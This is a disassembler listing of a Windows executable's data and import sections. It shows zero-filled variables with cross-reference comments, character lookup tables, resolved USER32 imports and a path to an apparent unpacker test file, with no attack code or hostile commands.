dword_6737A4 dd 0 ; sub_424699+AD�w ...
dword_6737A8 dd 0 dword_6737AC dd 0 ; sub_424551+D�r
dword_6737B0 dd 2 dup(0) db 0
byte_6737B9 db 0 ; DATA XREF: sub_426EEF+20E�o
word_6737BA dw 0 ; DATA XREF: sub_426EEF+228�o
dword_6737BC dd 9DBh dup(0) byte_675F28 db 0 ; DATA XREF: sub_426EEF+CB�w
; sub_426EEF+1DC�o
align 2
word_675F2A dw 0 ; DATA XREF: sub_426EEF+D2�w
; sub_426EEF+1FC�w
word_675F2C dw 0 ; DATA XREF: sub_426EEF+DA�w
align 10h
word_675F30 dw 0 ; DATA XREF: sub_426EEF+F6�w
align 4
byte_675F34 db 0 ; DATA XREF: sub_426EEF+87�r
; sub_426EEF+90�w
align 2
word_675F36 dw 0 ; DATA XREF: sub_426EEF+B2�w
dd 0
byte_675F3C db 0 ; DATA XREF: sub_426EEF+FF�w
byte_675F3D db 0 ; DATA XREF: sub_426EEF+106�w
; sub_426EEF+209�o
word_675F3E dw 0 ; DATA XREF: sub_426EEF+10D�w
dword_675F40 dd 0 ; sub_426EEF+1F6�o
dword_675F44 dd 0 word_675F48 dw 0 ; DATA XREF: sub_426EEF+BB�w
word_675F4A dw 0 ; DATA XREF: sub_426EEF+C5�w
word_675F4C dw 0 ; DATA XREF: sub_426EEF+138�w
; sub_426EEF+239�o
word_675F4E dw 0 ; DATA XREF: sub_426EEF+145�w
dword_675F50 dd 0 ; sub_426EEF+1D2�w
dword_675F54 dd 0 dword_675F58 dd 0 dword_675F5C dd 0 ; sub_426EEF+16B�w
byte_675F60 db 0 ; DATA XREF: sub_426EEF+1AC�w
align 10h
word_675F70 dw 0 ; DATA XREF: sub_426EEF+193�w
align 4
word_675F74 dw 0 ; DATA XREF: sub_426EEF+188�w
word_675F76 dw 0 ; DATA XREF: sub_426EEF+19C�w
; sub_426EEF+251�w
dd 2 dup(0)
db 2 dup(0)
byte_675F82 db 0 ; DATA XREF: sub_426EEF+165�w
align 4
dd 0Fh dup(0)
dword_675FC0 dd 0Eh dup(0) dword_675FF8 dd 5Dh dup(0) dword_67616C dd 0A3h dup(0) dword_6763F8 dd 21h dup(0) ; sub_40A938:loc_40C4FC�o ...
byte_67647C db 0 ; DATA XREF: sub_428597+1D0�o
; sub_428597+1DC�w ...
byte_67647D db 0 ; DATA XREF: sub_428597+1EA�w
word_67647E dw 0 ; DATA XREF: sub_428597+211�w
word_676480 dw 0 ; DATA XREF: sub_428597+202�w
; sub_428597:loc_4288F3�w
word_676482 dw 0 ; DATA XREF: sub_428597+217�w
byte_676484 db 0 ; DATA XREF: sub_428597+21E�w
byte_676485 db 0 ; DATA XREF: sub_428597+1E3�w
word_676486 dw 0 ; DATA XREF: sub_428597+371�w
; sub_428597+3A6�w
dword_676488 dd 0 ; sub_428597+326�r
dword_67648C dd 0 word_676490 dw 0 ; DATA XREF: sub_428597+320�w
; sub_428597+380�o
word_676492 dw 0 ; DATA XREF: sub_428597+2B4�w
; sub_428597+2F7�r ...
dword_676494 dd 0 ; sub_428597+363�w
dword_676498 dd 0 ; sub_428597+337�w ...
byte_67649C db 0 ; DATA XREF: sub_428597+292�r
; sub_428597+2A4�w
byte_67649D db 0 ; DATA XREF: sub_428597+24E�w
; sub_428597+330�w ...
word_67649E dw 0 ; DATA XREF: sub_428597+26A�w
word_6764A0 dw 0 ; DATA XREF: sub_428597+378�w
; sub_428597+3B4�w
word_6764A2 dw 0 ; DATA XREF: sub_428597+2AD�w
word_6764A4 dw 0 ; DATA XREF: sub_428597+2E4�w
; sub_428597+3BC�o
word_6764A6 dw 0 ; DATA XREF: sub_428597+2FE�w
; sub_428597+393�w
dword_6764A8 dd 0 dd 2 dup(0)
dword_6764B4 dd 0 ; sub_428597+3A1�o
dword_6764B8 dd 0 byte_6764BC db 0 ; DATA XREF: sub_428597+2BF�w
byte_6764BD db 0 ; DATA XREF: sub_428597+2CE�w
word_6764BE dw 0 ; DATA XREF: sub_428597+2DE�w
dword_6764C0 dd 6 dup(0) dword_6764D8 dd 0 ; sub_428597+3C6�r
align 10h
dword_6764E0 dd 100h dup(0) ; sub_428597+197�o ...
dword_6768E0 dd 0 ; sub_42A705+A4�w
align 8
word_6768E8 dw 0 ; DATA XREF: sub_42A705+55�r
; sub_42A705+9A�o
word_6768EA dw 0 ; DATA XREF: sub_42A705+48�r
db 2 dup(0)
word_6768EE dw 0 ; DATA XREF: sub_42A705+3B�r
word_6768F0 dw 0 ; DATA XREF: sub_42A705+2E�r
word_6768F2 dw 0 ; DATA XREF: sub_42A705+21�r
dd 2 dup(0)
dword_6768FC dd 0 dword_676900 dd 0 ; sub_432034:loc_43205D�w ...
dword_676904 dd 0 ; sub_432B5F:loc_432B71�r ...
dd 0
dword_67690C dd 0 dword_676910 dd 0 ; sub_42B2CA+104�r ...
dword_676914 dd 0 dword_676918 dd 0 ; sub_42D5DC+2D�w ...
align 10h
dword_676920 dd 1463A0h, 0FFFFFFFFh, 4 dup(0)dword_676938 dd 146328h, 0FFFFFFFFh, 4 dup(0)dword_676950 dd 146378h, 0FFFFFFFFh, 4 dup(0)dword_676968 dd 146350h, 0FFFFFFFFh, 4 dup(0)dword_676980 dd 2 dup(0) ; .text:00434E67�o
dword_676988 dd 0 ; sub_42A9B1:loc_42AA7F�r ...
dd 3 dup(0)
dword_676998 dd 0 ; sub_42A9B1+C0�r ...
dd 4 dup(0)
dword_6769AC dd 0 byte_6769B0 db 28h ; DATA XREF: .text:0042C4F6�w
byte_6769B1 db 0Ah ; DATA XREF: sub_42B019:loc_42B08F�r
align 4
dword_6769B4 dd 501h dword_6769B8 dd 5 dword_6769BC dd 1 dword_6769C0 dd 1 dword_6769C4 dd 0B427C0h dd 0
dword_6769CC dd 0B427E8h ; sub_431213+27�r ...
dword_6769D0 dd 0 dword_6769D4 dd 0 ; sub_434B89+4�r ...
dd 0
off_6769DC dd offset aCM_unpackerPac ; DATA XREF: sub_432C18+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_6769E4 db 0 ; DATA XREF: sub_42C0F0+5�r
; sub_430A86+32�w
align 4
dword_6769E8 dd 0 dword_6769EC dd 0 ; sub_430A86+97�w
dword_6769F0 dd 1 ; sub_430CCF+4C�w ...
dword_6769F4 dd 0 ; sub_431FD0+38�r ...
dword_6769F8 dd 0 align 10h
dword_676A00 dd 1 ; sub_4327A5+4�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_432C18:loc_432C2F�o
; .text:off_6769DC�o
align 10h
dd 3Ah dup(0)
dword_676B08 dd 1 ; sub_432E65+23�w ...
dword_676B0C dd 0 dword_676B10 dd 1 ; sub_43340D:loc_433477�w
dword_676B14 dd 0 dword_676B18 dd 0 ; sub_4338E9+7A�w ...
align 10h
dword_676B20 dd 0 ; sub_4338E9+5D�r
dword_676B24 dd 10h dup(0) word_676B64 dw 0 ; DATA XREF: sub_433B91+A8�r
word_676B66 dw 0 ; DATA XREF: sub_4338E9+6B�r
; sub_433B91+DB�r ...
word_676B68 dw 0 ; DATA XREF: sub_433B91+CA�r
word_676B6A dw 0 ; DATA XREF: sub_433B91+D3�r
; sub_433B91:loc_433C83�r
word_676B6C dw 0 ; DATA XREF: sub_433B91+C0�r
word_676B6E dw 0 ; DATA XREF: sub_433B91+B8�r
word_676B70 dw 0 ; DATA XREF: sub_433B91+B0�r
word_676B72 dw 0 ; DATA XREF: sub_433B91+9E�r
dword_676B74 dd 0 dword_676B78 dd 10h dup(0) word_676BB8 dw 0 ; DATA XREF: sub_433B91+46�r
word_676BBA dw 0 ; DATA XREF: sub_4338E9:loc_433977�r
; sub_433B91+78�r ...
word_676BBC dw 0 ; DATA XREF: sub_433B91+67�r
word_676BBE dw 0 ; DATA XREF: sub_433B91+70�r
; sub_433B91:loc_433C15�r
word_676BC0 dw 0 ; DATA XREF: sub_433B91+5D�r
word_676BC2 dw 0 ; DATA XREF: sub_433B91+55�r
word_676BC4 dw 0 ; DATA XREF: sub_433B91+4D�r
word_676BC6 dw 0 ; DATA XREF: sub_433B91+3E�r
dword_676BC8 dd 0 dword_676BCC dd 0 ; sub_4338E9:loc_433A4A�r ...
dword_676BD0 dd 0 ; sub_4338BB+10�r ...
dd 19h dup(0)
dword_676C38 dd 0 ; resolved to->USER32.MessageBoxA ; sub_434CA0+2E�w ...
dword_676C3C dd 0 ; resolved to->USER32.GetActiveWindow ; sub_434CA0:loc_434CEF�r
dword_676C40 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_434CA0+60�r
dword_676C44 dd 0 align 10h
dword_676C50 dd 2 dup(0) ; .text:00453D18�o ...
dword_676C58 dd 0 ; sub_434F51+81�o
dword_676C5C dd 0 ; sub_434F51+4A�o
dword_676C60 dd 0 ; sub_434F51+3D�o
dword_676C64 dd 0 ; sub_434F51+57�o
dd 0
dword_676C6C dd 0 ; sub_435A15+48�w ...
dd 2 dup(0)
byte_676C78 db 0 ; DATA XREF: sub_4290F9:loc_429153�r
; sub_4290F9+63�w
byte_676C79 db 0 ; DATA XREF: sub_4290F9+6F�r
; sub_4290F9+78�w
align 4
dword_676C7C dd 4E4h ; sub_4325F8+79�w ...
dword_676C80 dd 3 dup(0) ; sub_4325F8+179�o ...
dword_676C8C dd 0 ; sub_4325F8+168�w ...
dd 4 dup(0)
byte_676CA0 db 0 ; DATA XREF: sub_43284B:loc_432957�w
; sub_43284B:loc_432974�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h
db 0E8h
byte_676D69 db 0E9h, 0EAh, 0EBh ; DATA XREF: .text:off_446E18�o
dd 0EFEEEDECh, 0F3F2F1F0h, 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh
dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
dd 0D6D5D4h, 0DBDAD9D8h, 9FDEDDDCh
byte_676DA0 db 0 ; DATA XREF: sub_4325F8+6E�o
; sub_4325F8+BE�o ...
byte_676DA1 db 0 ; DATA XREF: sub_42BEC5+5D�r
; sub_4325F8+AB�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_676EA4 dd 0 ; sub_4325F8+137�w ...
dword_676EA8 dd 1 ; sub_432B5F+AD�w
dword_676EAC dd 1 ; sub_4329D0+11�w ...
dword_676EB0 dd 0 ; sub_42B71B:loc_42B764�r ...
dword_676EB4 dd 0 ; sub_42B71B+11�r ...
dword_676EB8 dd 0 ; sub_42A954+1A�r ...
dword_676EBC dd 0 ; sub_42A7F0:loc_42A857�w ...
dword_676EC0 dd 0B41F18h ; sub_42C048+81�r ...
dword_676EC4 dd 2Ah dup(0) dword_676F6C dd 15h dup(0) dword_676FC0 dd 20h ; sub_42F3EE+5�r ...
dword_676FC4 dd 0 ; sub_42CE87+5�r ...
dword_676FC8 dd 0 ; sub_42C855+25A�r ...
dword_676FCC dd 0 ; sub_42C855+311�w ...
dword_676FD0 dd 0 ; sub_42C855+22D�r ...
dword_676FD4 dd 0 ; sub_42C82A�r ...
dword_676FD8 dd 0 ; sub_42C82A+8�r ...
dword_676FDC dd 0 ; sub_42B2CA+64�r ...
dword_676FE0 dd 0B40000h ; sub_429822+CE�r ...
dword_676FE4 dd 1 ; sub_429822+2E�r ...
dword_676FE8 dd 142340h ; sub_432B07+F�r ...
dword_676FEC dd 0 ; sub_42C048+41�w ...
dd 4 dup(0)
dword_677000 dd 400h dup(0) ; .text:00450EA8�o
dword_678000 dd 0 ; sub_42C048:loc_42C062�w ...
align 2000h
_text ends
; Section 3. (virtual address 0027C000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0027C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 67C000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start